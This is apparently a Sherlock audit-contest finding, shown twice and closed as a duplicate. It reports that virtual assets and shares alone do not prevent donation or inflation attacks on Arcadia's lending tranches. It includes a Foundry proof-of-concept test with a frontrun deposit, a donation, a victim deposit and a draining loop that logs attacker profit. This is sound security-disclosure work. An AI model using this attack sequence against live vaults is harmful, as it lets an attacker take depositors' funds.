Closed sherlock-admin closed 9 months ago
Kalyan-Singh
medium
To fully prevent donation attacks the shares of vault must be in higher precision. i.e decimal offset is also needed.
Donations can be done via donateToTranche function in LendingPool.sol
Here is a foundry poc to show that VAS alone can't prevent inflation attacks
/** * Created by Pragma Labs * SPDX-License-Identifier: BUSL-1.1 */ pragma solidity 0.8.22; import { Scenario_Lending_Test } from "./_Scenario.t.sol"; import { LogExpMath } from "../../src/libraries/LogExpMath.sol"; import { AccountErrors } from "../../lib/accounts-v2/src/libraries/Errors.sol"; import { AssetValuationLib } from "../../lib/accounts-v2/src/libraries/AssetValuationLib.sol"; import { Constants } from "../../lib/accounts-v2/test/utils/Constants.sol"; import { LendingPool } from "../../src/LendingPool.sol"; import { LendingPoolErrors } from "../../src/libraries/Errors.sol"; import { TrancheExtension } from "../utils/Extensions.sol"; contract SceanrioDonation is Scenario_Lending_Test { function setUp() public override{ // super.setUp(); deployArcadiaLendingWithoutAccounts(); } // for donation attack poc function testDonationAttack2() public { uint vas = 1; uint assetAmt = 5e18; uint donationAmt = assetAmt; uint frontrunAmt = 1; // extraAmt minted for the while loop uint extraAmt = 100; address bob = address(12345); vm.startPrank(users.creatorAddress); TrancheExtension tranche1 = new TrancheExtension(address(pool), vas, "Tranche1", "T1"); pool.addTranche(address(tranche1), 50); // minting the asset asset.mint(users.creatorAddress,assetAmt); asset.mint(bob,frontrunAmt + donationAmt + extraAmt); asset.approve(address(pool),type(uint256).max); vm.stopPrank(); // frontrunning vm.startPrank(bob); asset.approve(address(pool),type(uint256).max); uint shares1 = tranche1.deposit(frontrunAmt, bob); // donating pool.donateToTranche(0,donationAmt); vm.stopPrank(); vm.startPrank(users.creatorAddress); //deposting from user uint shares2=tranche1.deposit(assetAmt,users.creatorAddress); // withdrawals uint amt2 = tranche1.redeem(shares2,users.creatorAddress,users.creatorAddress); vm.stopPrank(); vm.startPrank(bob); uint amt1 = tranche1.redeem(shares1, bob, bob); uint amtLeftOut; while (asset.balanceOf(address(pool)) > 100){ uint shareWhile = tranche1.deposit(1, bob); amtLeftOut += tranche1.redeem(shareWhile, bob, bob); } emit log_named_decimal_uint("amtBob", amt1, 18); emit log_named_decimal_uint("amtUser", amt2, 18); emit log_named_decimal_uint("sharesBob", shares1, 18); emit log_named_decimal_uint("sharesUser", shares2, 18); emit log_named_decimal_uint("assetsInPool", asset.balanceOf(address(pool)), 18); emit log_named_decimal_uint("realizedLiq", pool.liquidityOfAndSync(address(tranche1)), 18); emit log_named_decimal_uint("amtLeftOut", amtLeftOut, 18); emit log_named_decimal_uint("bobProfit", asset.balanceOf(bob) - donationAmt - frontrunAmt - extraAmt, 18); vm.stopPrank(); } }
add it as a new file under lending-v2/test/scenario.
and run the test using
forge test --match-test testDonationAttack2 -vv
Donation attacks
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/Tranche.sol#L350-L355
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L350-L363
Manual Review
https://ethereum-magicians.org/t/address-eip-4626-inflation-attacks-with-virtual-shares-and-assets/12677/10
Duplicate of #85
Kalyan-Singh
medium
Donation attacks on Tranches can't be prevented by VAS alone
Summary
To fully prevent donation attacks the shares of vault must be in higher precision. i.e decimal offset is also needed.
Vulnerability Detail
Donations can be done via donateToTranche function in LendingPool.sol
Here is a foundry poc to show that VAS alone can't prevent inflation attacks
add it as a new file under lending-v2/test/scenario.
and run the test using
Impact
Donation attacks
Code Snippet
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/Tranche.sol#L350-L355
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L350-L363
Tool used
Manual Review
Recommendation
https://ethereum-magicians.org/t/address-eip-4626-inflation-attacks-with-virtual-shares-and-assets/12677/10
Duplicate of #85